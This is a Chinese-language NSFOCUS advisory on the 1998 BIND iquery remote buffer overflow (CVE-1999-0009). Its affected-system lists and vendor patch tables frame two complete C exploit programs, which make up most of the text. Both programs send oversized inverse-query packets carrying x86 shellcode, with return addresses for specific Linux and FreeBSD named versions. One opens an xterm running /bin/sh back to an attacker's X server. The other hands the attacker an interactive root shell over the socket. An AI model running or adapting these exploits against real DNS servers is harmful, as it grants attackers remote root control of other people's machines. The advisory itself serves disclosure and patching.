安全研究

安全漏洞
多家厂商BIND iquery远程缓冲区溢出漏洞

发布日期:1998-04-08
更新日期:1998-04-08

受影响系统:
Multiple Vendor BIND
    - BSDI BSD/OS 2.1
    - BSDI BSD/OS 2.0.1
    - BSDI BSD/OS 2.0
    - Caldera OpenLinux Standard 1.0
    - DG/UX 5.4 4.11
    - DG/UX 5.4 4.1
    - DG/UX 5.4 3.1
    - DG/UX 5.4 3.0
    - IBM AIX 4.3
    - IBM AIX 4.2.1
    - IBM AIX 4.2
    - IBM AIX 4.1.5
    - IBM AIX 4.1.4
    - IBM AIX 4.1.3
    - IBM AIX 4.1.2
    - IBM AIX 4.1.1
    - IBM AIX 4.1
    - NetBSD 1.3.1
    - NetBSD 1.3
    - NetBSD 1.2.1
    - NetBSD 1.2
    - NetBSD 1.1
    - NetBSD 1.0
    - RedHat Linux 5.1
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SGI IRIX 6.3
    - SGI IRIX 6.2
    - SGI IRIX 6.1
    - SGI IRIX 6.0.1XFS
    - SGI IRIX 6.0.1
    - SGI IRIX 6.0
    - SGI IRIX 5.3XFS
    - SGI IRIX 5.3
    - SGI IRIX 5.2
    - SGI IRIX 5.1.1
    - SGI IRIX 5.1
    - SGI IRIX 5.0.1
    - SGI IRIX 5.0
    - SGI IRIX 4.0.5IPR
    - SGI IRIX 4.0.5H
    - SGI IRIX 4.0.5G
    - SGI IRIX 4.0.5F
    - SGI IRIX 4.0.5E
    - SGI IRIX 4.0.5D
    - SGI IRIX 4.0.5A
    - SGI IRIX 4.0.5(IOP)
    - SGI IRIX 4.0.5
    - SGI IRIX 4.0.4T
    - SGI IRIX 4.0.4B
    - SGI IRIX 4.0.4
    - SGI IRIX 4.0.3
    - SGI IRIX 4.0.2
    - SGI IRIX 4.0.1T
    - SGI IRIX 4.0.1
    - SGI IRIX 4.0
    - SGI IRIX 3.3.3
    - SGI IRIX 3.3.2
    - SGI IRIX 3.3.1
    - SGI IRIX 3.3
    - SGI IRIX 3.2
    - Sun Solaris 2.6 x86
    - Sun Solaris 2.5.1 SPARC
    - Sun Solaris 2.5.1
    - Sun Solaris 2.5.1 x86
    - Sun Solaris 2.5
    - Sun Solaris 2.5 x86
    - Sun Solaris 2.4
    - Sun Solaris 2.3
不受影响系统:
Multiple Vendor BIND
    - BSDI BSD/OS 4.0
Multiple Vendor BIND
    - BSDI BSD/OS 3.0
Multiple Vendor BIND
    - Caldera OpenLinux Standard 1.2
Multiple Vendor BIND
    - Caldera OpenLinux Standard 1.1
Multiple Vendor BIND
    - FreeBSD 3.3
Multiple Vendor BIND
    - NetBSD 1.4 x86
Multiple Vendor BIND
    - NetBSD 1.3.3
Multiple Vendor BIND
    - NetBSD 1.3.2
Multiple Vendor BIND
    - RedHat Linux 5.2 x86
Multiple Vendor BIND
    - RedHat Linux 5.1
Multiple Vendor BIND
    - SGI IRIX 6.5
Multiple Vendor BIND
    - SGI IRIX 6.4
描述:
BUGTRAQ  ID: 134
CVE(CAN) ID: CVE-1999-0009

BIND是一种被广泛应用的DNS服务器程序,由Internet Software Consortium开发维护。

低于4.9.7和8.1.2的BIND版本中在处理反向查询时存在一个严重的缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上以root用户的权限执行任意指令。

当req_iquery()函数在处理一个反向域名解析请求时,如果用户提供超长的数据,将导致发生堆栈溢出,远程攻击者可能通过溢出攻击获取主机的root用户权限。这个漏洞影响所有使用有问题BIND版本的系统,而且已经有很多攻击程序流传开来。

<*链接:http://www.cert.org/advisories/CA-1998-05.html
        ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
        ftp://patches.sgi.com/support/free/security/advisories/19980603-02-PX
        ftp://ftp.auscert.org.au/pub/auscert/ESB/ESB-98.137
        http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

prym 提供了如下测试程序:

/*
* z, thnx.
* ganked the xterm exec from adm, thnx.
* have fun.
* -prym
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>

#define REMOTE
#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0
#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)

struct target_type
{
  char desc[40];
  int systype;
  unsigned long addr;
  unsigned long opt_addr;
};

struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
  {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
  {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
  {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
  {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
  {{0},0,0,0}
};

unsigned long resolve(char *host)
{
  long i;
  struct hostent *he;

  if((i=inet_addr(host))<0)
    if((he=gethostbyname(host))==NULL)
      return(0);
    else
      return(*(unsigned long *)he->h_addr);

  return(i);
}

int send_packet(int fd, char *buff, int len)
{
  char tmp[2], *ptr=tmp;

  PUTSHORT(len,ptr);
  if(write(fd,tmp,2)!=2)
    return(-1);

  if(write(fd,buff,len)!=len)
    return(-1);

  return(1);
}

int attack(int fd, struct in_addr us, struct target_type t,
       unsigned long offset, int optimized)
{
  char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;

  memset(dnsh,0,sizeof(HEADER));
  dnsh->id = htons(31337);
  dnsh->opcode = IQUERY;
  dnsh->rd = 1;
  dnsh->ra = 1;
  dnsh->ancount = htons(1);
  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  *ptr = '\0';
  ptr++;
  PUTSHORT(T_A,ptr);
  PUTSHORT(C_IN,ptr);
  PUTLONG(31337,ptr);
  dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
  PUTSHORT(dlen,ptr);
  len += PRE_OF_DATALEN;

  memset(ptr,'X',(sizeof(buff)-(ptr-buff)));

  if(t.systype==0)
    {
#ifdef REMOTE
      char c1[] =
    "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
    "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
    "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
    "\x80\xe8\xcc\xff\xff\xff";
      char c2[] =
    "/usr/bin/X11/xterm\xff-display\xff";
      char c3[32];
      char c4[] =
    "\xfe\xe8\xb1\xff\xff\xff";

      snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));

      c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
      c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);

      i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c1,strlen(c1));
      memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
      memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
      memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
      char c0de[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
      int i = EVILSPACE-strlen(c0de);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c0de,strlen(c0de));
#endif
    }
  else
    return(0);

  if(!optimized)
    {
      memcpy((ptr+(dlen-16)),&al,sizeof(al));
      memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
    }

  i = (optimized?t.opt_addr:t.addr)+offset;
  memcpy((ptr+(dlen-4)),&i,sizeof(i));
  len += dlen;

  return(send_packet(fd,buff,len));
}

int main(int argc, char *argv[])
{
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
  struct sockaddr_in sa;
  struct in_addr xs;

  for(i=0;target[i].desc[0];i++);

  if(argc<3)
    {
      fprintf(stderr,"\ntarget types:\n");
      fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
          "description");
      for(target_index=0;target_index<i;target_index++)
    fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
        (unsigned int)target[target_index].addr,
        (unsigned int)target[target_index].opt_addr,
        target[target_index].desc);
      fprintf(stderr,
          "\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
          argv[0]);
      exit(-1);
    }

  if((argc>3)&&((target_index=atoi(argv[3]))>=i))
    {
      fprintf(stderr,"error: invalid target type %d\n",target_index);
      exit(-1);
    }

  if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
    {
      fprintf(stderr,"error: internal error\n");
      exit(-1);
    }

  if(argc>4)
    {
      optimized = atoi(argv[4]);
      if((optimized!=0)&&(optimized!=1))
    {
      fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
      exit(-1);
    }
    }

  if((optimized==0)&&(target[target_index].addr==0))
    optimized = 1;

  if((optimized==1)&&(target[target_index].opt_addr==0))
    optimized = 0;

  if(argc>5)
    offset = atoi(argv[5]);

  if(!(xs.s_addr=resolve(argv[2])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
      exit(-1);
    }

  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
    {
      perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      perror("error: connect");
      exit(-1);
    }

  printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  printf("target type        : %s\n",target[target_index].desc);
  printf("optimized named    : %s\n",(optimized?"YES":"NO"));
  printf("anbuff addr        : 0x%x\n",(unsigned int)
     (optimized?target[target_index].opt_addr:target[target_index].addr));
  printf("anbuff addr offset : %lu\n",offset);
  printf("xterm display dest : %s:0\n",inet_ntoa(xs));
  printf("exploiting . . .\n");

  switch(attack(sock,xs,target[target_index],offset,optimized))
    {
    case -1:
      perror("error: attack");
      return(-1);
      break;

    case 0:
      fprintf(stderr,"error: internal error\n");
      return(-1);
      break;
    }

  if(close(sock)!=0)
    {
      perror("error: close");
      return(-1);
    }

  exit(0);
}
ROTShB 提供了如下测试程序:

/*
* have fun.
* -ROTShB
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define DEFAULT_TARGET       0
#define DEFAULT_OPTIMIZATION 0
#define DEFAULT_ANBUF_OFFSET 300
#define DLEN_VAL             4
#define NPACKETSZ            512
#define NMAXDNAME            1025
#define PRE_EGG_DATALEN      (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL             (DLEN_VAL+PRE_EGG_DATALEN)
#define BUFFSIZE             4096

struct target_type
{
  char          desc[40];
  int           systype;
  unsigned long addr;
  unsigned long opt_addr;
  int           fd;
};

struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-REL (se)",0,0xbffff21c,0xbffff23c,4},
  {"x86 Linux 2.0.x named 4.9.5-REL (le)",0,0xbfffeedc,0xbfffeefc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (se)",0,0xbffff294,0xbffff2cc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (le)",0,0xbfffef8c,0xbfffefb4,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (se)",0,0xbffff3e3,0xbffff403,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (le)",0,0xbffff188,0xbffff194,4},
  {"x86 Linux 2.0.x named 8.1-REL (se)",0,0xbffff6a4,0xbffff6f8,5},
  {"x86 Linux 2.0.x named 8.1-REL (le)",0,0xbffff364,0xbffff3b8,5},
  {"x86 Linux 2.0.x named 8.1.1 (se)",0,0xbffff6b8,0xbffff708,5},
  {"x86 Linux 2.0.x named 8.1.1 (le)",0,0xbffff378,0xbffff3c8,5},
  {"x86 FreeBSD 3.x named 4.9.5-REL (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-REL (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (se)",1,0xefbfd480,0xefbfd4e8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (le)",1,0xefbfd218,0xefbfd274,4},
  {{0},0,0,0,0}
};

unsigned long resolve(char *host)

{
  long i;
  struct hostent *he;

  if((i=inet_addr(host))==(-1))
    if((he=gethostbyname(host))==NULL)
      return(0);
    else
      return(*(unsigned long *)he->h_addr);

  return(i);
}

int send_packet(int fd, char *buff, int len)
{
  char tmp[2], *ptr=tmp;

  PUTSHORT(len,ptr);

  if(write(fd,tmp,2)!=2)
    return(-1);

  if(write(fd,buff,len)!=len)
    return(-1);

  return(1);
}

int attack(int fd, struct target_type t, unsigned long offset, int optimized)
{
  char buff[BUFFSIZE], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0;

  (void)memset(dnsh,0,sizeof(HEADER));

  dnsh->id      = htons(31337);
  dnsh->opcode  = IQUERY;
  dnsh->rd      = 1;
  dnsh->ra      = 1;
  dnsh->ancount = htons(1);

  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  *ptr = '\0';
  ptr++;

  i = T_A;
  PUTSHORT(i,ptr);

  i = C_IN;
  PUTSHORT(i,ptr);

  i = 31337;
  PUTLONG(i,ptr);

  if(t.systype==0)
    {
      char c0de[] =
        "\x31\xc0\xb0\x3f\x31\xdb\xb3\xff\x31\xc9\xcd\x80\x31\xc0\xb0\x3f\xb1"
        "\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd\x80\xeb\x24\x5e\x8d\x1e\x89"
        "\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10"
        "\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
        "\xff\xff\xff/bin/sh";

      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      c0de[7] = t.fd;

      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      i = (optimized?t.opt_addr:t.addr)+offset;

      len += dlen;
    }


  else if(t.systype==1)
    {
      char c0de[] =
        "\xeb\x6e\x5e\xc6\x06\x9a\x31\xc9\x89\x4e\x01\xc6\x46\x05\x07\x88"
        "\x4e\x06\x51\x31\xdb\xb3\x04\x53\x66\xc7\x46\x07\xeb\xa7\x31\xc0"
        "\xb0\x5a\x50\xeb\x50\xfe\xc1\x51\x53\xc6\x46\x08\xb6\x31\xc0\xb0"
        "\x5a\x50\xeb\x41\xfe\xc1\x51\x53\xc6\x46\x08\xc5\x31\xc0\xb0\x5a"
        "\x50\xeb\x32\xc7\x46\x07\x2f\x62\x69\x6e\xc7\x46\x0b\x2f\x73\x68"
        "\x21\x31\xc0\x88\x46\x0e\x8d\x5e\x07\x89\x5e\x0f\x89\x46\x13\x8d"
        "\x5e\x13\x53\x8d\x5e\x0f\x53\x8d\x5e\x07\x53\xb0\x3b\x50\xeb\x05"
        "\xe8\x8d\xff\xff\xff";

      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      c0de[22] = t.fd;

      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      i = (optimized?t.opt_addr:t.addr)+offset;
      (void)memcpy((ptr+(dlen-4)),&i,sizeof(i));

      len += dlen;
    }
  else
    return(0);

  return(send_packet(fd,buff,len));
}

int main(int argc, char *argv[])
{
  char xbuf[128], ybuf[128];
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int ti, opt=DEFAULT_OPTIMIZATION, sock, i;
  int xlen=0, ylen=0;
  fd_set rd, wr;
  struct sockaddr_in sa;

  for(i=0;((target[i].addr)||(target[i].opt_addr));i++);

  if(argc<2)
    {
      (void)fprintf(stderr,"\ntarget types:\n");

      for(ti=0;ti<i;ti++)
        (void)fprintf(stderr," %-2d : %s\n",ti,target[ti].desc);

      (void)fprintf(stderr,"\nerror: usage: %s <host> [tt] [opt] [ofst]\n",
                    argv[0]);
      exit(-1);
    }

  if(argc>2)
    {
      ti = atoi(argv[2]);
      if((ti<0)||(ti>i))
        {
          (void)fprintf(stderr,"error: invalid target type %d\n",ti);
          exit(-1);
        }
    }
  else
    ti = DEFAULT_TARGET;

  if(argc>3)
    {
      opt = atoi(argv[3]);
      if((opt!=0)&&(opt!=1))
        {
          (void)fprintf(stderr,"error: invalid optimization setting %d\n",opt);
          exit(-1);
        }
    }

  if(argc>4)
    offset = atoi(argv[4]);


  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      (void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port   = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1))
    {
      (void)perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      (void)perror("error: connect");
      exit(-1);
    }

  (void)printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  (void)printf("target type        : %s\n",target[ti].desc);
  (void)printf("optimized named    : %s\n",(opt?"YES":"NO"));
  (void)printf("anbuff addr        : 0x%x\n",(unsigned int)
               (i=(opt?target[ti].opt_addr:target[ti].addr)));
  (void)printf("anbuff addr offset : %lu\n",offset);
  (void)printf("ret addr           : 0x%x\n",(unsigned int)(i+offset));
  (void)printf("fd to make dups of : %d\n",target[ti].fd);

  (void)printf("here we go...\n");

  switch(attack(sock,target[ti],offset,opt))
    {
    case -1:
      (void)perror("error: attack");
      exit(-1);
      break;

    case 0:
      (void)fprintf(stderr,"error: internal error\n");
      exit(-1);
      break;
    }

  (void)printf("have fun.\n");
  (void)printf("-ROTShB\n");

  while(1)
    {
      FD_ZERO(&rd);
      if(ylen<(sizeof(ybuf)-1))
        FD_SET(sock,&rd);
      if(xlen<(sizeof(xbuf)-1))
        FD_SET(fileno(stdin),&rd);

      FD_ZERO(&wr);
      if(xlen)
        FD_SET(sock,&wr);
      if(ylen)
        FD_SET(fileno(stdout),&wr);

      if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1))
        {
          (void)perror("error: select");
          break;
        }

      if(FD_ISSET(fileno(stdin),&rd))
        {
          if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          xlen += i;
          if(!(--ti)) continue;
        }


      if(FD_ISSET(sock,&wr))
        {
          if(write(sock,xbuf,xlen)!=xlen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          xlen = 0;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(sock,&rd))
        {
          if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          ylen += i;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(fileno(stdout),&wr))
        {
          if(write(fileno(stdout),ybuf,ylen)!=ylen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          ylen = 0;
          if(!(--ti)) continue;
        }
    }

  if(close(sock)==(-1))
    {
      (void)perror("error: close");
      exit(-1);
    }

  exit(0);
}

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 没有合适的临时解决方法。

厂商补丁:

HP
--
HP已经为此发布了一个安全公告(HPSBUX9808-083)以及相应补丁:
HPSBUX9808-083:Security Vulnerability in BIND on HP-UX
链接:

补丁下载:

ftp://us-ffs.external.hp.com/hp-ux_patches

操作系统及补丁号:

HP-UX release  9.0, 9.01, 9.03, 9.04, 9.05, & 9.07: PHNE_13187

HP-UX release  10.00, 10.01, 10.10 and 10.20:       PHNE_14617

--->>> HP-UX release  10.16:                              *PHNE_16232

HP-UX release  10.24:                             **PHNE_16204

HP-UX release  11.00:                               PHNE_12957

SGI
---
SGI已经为此发布了一个安全公告(19980603-01-PX)以及相应补丁:
19980603-01-PX:IRIX BIND DNS Vulnerabilities
链接:ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX

补丁下载:

http://support.sgi.com/
ftp://patches.sgi.com/support/patchset/

补丁情况:

系统版本       是否受影响      补丁号    
----------     -----------     ---------    

IRIX 3.x          yes          not avail
IRIX 4.x          yes          not avail
IRIX 5.0.x        yes          not avail
IRIX 5.1.x        yes          not avail
IRIX 5.2          yes          not avail
IRIX 5.3          yes           3123
IRIX 6.0.x        yes          not avail
IRIX 6.1          yes          not avail
IRIX 6.2          yes           3117
IRIX 6.3          yes           2740
IRIX 6.4          yes           2741
IRIX 6.5          no

Sun
---
Sun已经为此发布了一个安全公告(Sun-00180)以及相应补丁:
Sun-00180:BIND
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba

补丁下载:

http://sunsolve.sun.com/sunsolve/pubpatches/patches.html

操作系统版本及对应的补丁号:

操作系统            补丁号    
_________________   _________
Solaris 2.6         105755-07
Solaris 2.6_x86     105756-07
Solaris 2.5.1       103663-15
Solaris 2.5.1_x86   103664-15
Solaris 2.5         103667-11
Solaris 2.5_x86     103668-11
Solaris 2.4         102479-13
Solaris 2.4_x86     102480-11
Solaris 2.3         101359-10
SunOS 4.1.4         106866-02
SunOS 4.1.3_U1      106865-02

浏览次数:21608
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障